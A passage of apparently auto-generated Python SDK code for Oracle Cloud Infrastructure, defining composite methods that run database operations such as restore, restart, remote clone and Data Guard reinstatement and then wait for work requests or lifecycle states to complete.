as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.modify_database_management(database_id, modify_database_management_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def register_autonomous_database_data_safe_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.register_autonomous_database_data_safe` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.register_autonomous_database_data_safe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.register_autonomous_database_data_safe(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_autonomous_container_database_dataguard_association_and_wait_for_work_request(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_autonomous_container_database_dataguard_association_and_wait_for_state(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database_dataguard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, reinstate_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ReinstateDataGuardAssociationDetails reinstate_data_guard_association_details: (required)
A request to reinstate a database in a standby role.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_data_guard_association(database_id, data_guard_association_id, reinstate_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, reinstate_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ReinstateDataGuardAssociationDetails reinstate_data_guard_association_details: (required)
A request to reinstate a database in a standby role.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_data_guard_association(database_id, data_guard_association_id, reinstate_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def remote_clone_pluggable_database_and_wait_for_work_request(self, remote_clone_pluggable_database_details, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.RemoteClonePluggableDatabaseDetails remote_clone_pluggable_database_details: (required)
Request to clone a pluggable database (PDB) to a different database (CDB) from the source PDB.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remote_clone_pluggable_database(remote_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def remote_clone_pluggable_database_and_wait_for_state(self, remote_clone_pluggable_database_details, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.RemoteClonePluggableDatabaseDetails remote_clone_pluggable_database_details: (required)
Request to clone a pluggable database (PDB) to a different database (CDB) from the source PDB.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remote_clone_pluggable_database(remote_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def remove_virtual_machine_from_vm_cluster_and_wait_for_work_request(self, remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.RemoveVirtualMachineFromVmClusterDetails remove_virtual_machine_from_vm_cluster_details: (required)
Request to remove Virtual Machines from the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remove_virtual_machine_from_vm_cluster(remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def remove_virtual_machine_from_vm_cluster_and_wait_for_state(self, remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
to enter the given state(s).
:param oci.database.models.RemoveVirtualMachineFromVmClusterDetails remove_virtual_machine_from_vm_cluster_details: (required)
Request to remove Virtual Machines from the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remove_virtual_machine_from_vm_cluster(remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_container_database_and_wait_for_work_request(self, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_container_database(autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_container_database_and_wait_for_state(self, autonomous_container_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_container_database(autonomous_container_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, restore_autonomous_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreAutonomousDatabaseDetails restore_autonomous_database_details: (required)
Request to perform an Autonomous Database restore.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_autonomous_database(autonomous_database_id, restore_autonomous_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_autonomous_database_and_wait_for_state(self, autonomous_database_id, restore_autonomous_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreAutonomousDatabaseDetails restore_autonomous_database_details: (required)
Request to perform an Autonomous Database restore.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_autonomous_database(autonomous_database_id, restore_autonomous_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_database_and_wait_for_work_request(self, database_id, restore_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreDatabaseDetails restore_database_details: (required)
Request to perform database restore.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_database(database_id, restore_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_database_and_wait_for_state(self, database_id, restore_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreDatabaseDetails restore_database_details: (required)
Request to perform database restore.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_database(database_id, restore_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_autonomous_container_database_encryption_key_and_wait_for_work_request(self, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
